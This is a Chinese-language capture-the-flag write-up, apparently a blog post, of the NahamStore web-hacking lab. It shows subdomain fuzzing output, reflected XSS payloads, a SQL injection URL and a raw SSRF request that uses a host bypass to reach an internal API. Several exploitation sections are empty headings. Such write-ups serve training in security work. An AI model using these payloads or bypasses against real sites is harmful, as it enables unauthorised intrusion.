nahamstore

(Updated: )
,

题目描述

难度:中
描述:在这个房间里,您将学习漏洞赏金狩猎和 Web 应用程序黑客的基础知识
前置条件:

基本信息

🚀 本地机器信息 目标机器信息
IP 10.17.5.121 10.10.100.228
OS kali linux
NahamStore 的创建是为了测试您通过 NahamSec 的“漏洞赏金狩猎和 Web 应用程序黑客简介”Udemy 课程所学到的知识。 部署机器,获得 IP 地址后,请继续下一步!

由 @NahamSec 创建的 Udemy 课程 | 由 @adamtlangley 创建的实验室

信息搜集

端口扫描

子域枚举

1
2
3
4
5
6
7
8
ffuf -u http://nahamstore.thm -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.nahamstore.thm" -fw 125

shop                    [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 732ms]
www                     [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 311ms]
marketing               [Status: 200, Size: 2025, Words: 692, Lines: 42, Duration: 353ms]
stock                   [Status: 200, Size: 67, Words: 1, Lines: 1, Duration: 415ms]
WWW                     [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 413ms]

截至目前我发现了三个在线站点

http://nahamstore.thm/
http://marketing.nahamstore.thm/
http://stock.nahamstore.thm/

路径枚举

漏洞发现

XSS

1
http://marketing.nahamstore.thm/?error=<script>alert(1)</script>
1
http://nahamstore.thm/product?id=1&name=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E
1
http://nahamstore.thm/search?q=%27%2Balert(1)%2B%27

SQL注入

1
http://nahamstore.thm/product?id=2

SSRF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
POST /stockcheck HTTP/1.1

Host: nahamstore.thm

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 69

Origin: http://nahamstore.thm

Connection: keep-alive

Referer: http://nahamstore.thm/product?id=2

Cookie: session=023eb953d53167fef31a620a71d256d9; token=7708256ecdefdd7e793acf8e488e9be9

Priority: u=0



product_id=2&server=stock.nahamstore.thm@internal-api.nahamstore.thm#

XXE

RCE2

漏洞利用

webshell

usershell

rootshell

知识点回顾

  1. 子域枚举
  2. 目录枚举
  3. 内容发现
  4. 模糊测试 GET & POST 参数
  5. XSS(跨站点脚本)
  6. XSS 旁路
  7. 存储型 XSS、反射型 XSS
  8. 打开重定向
  9. CSRF(跨站点请求伪造)
  10. CSRF 保护绕过
  11. IDOR (不安全的直接对象引用)
  12. LFI (本地文件包含)
  13. LFI 旁路
  14. SSRF(服务器端请求伪造)
  15. SSRF 旁路
  16. XXE(XML 外部实体注入)
  17. 通过 XLSX 文件进行盲 XXE
  18. RCE (远程代码执行)
  19. 密码猜测
  20. 编辑页面以获取 PHP 反向 shell
  21. 命令注入
  22. 基于错误的 SQL 注入
  23. 基于盲目的 SQL 注入

总结

加深了漏洞出现点和如何burpsuite的一些技巧。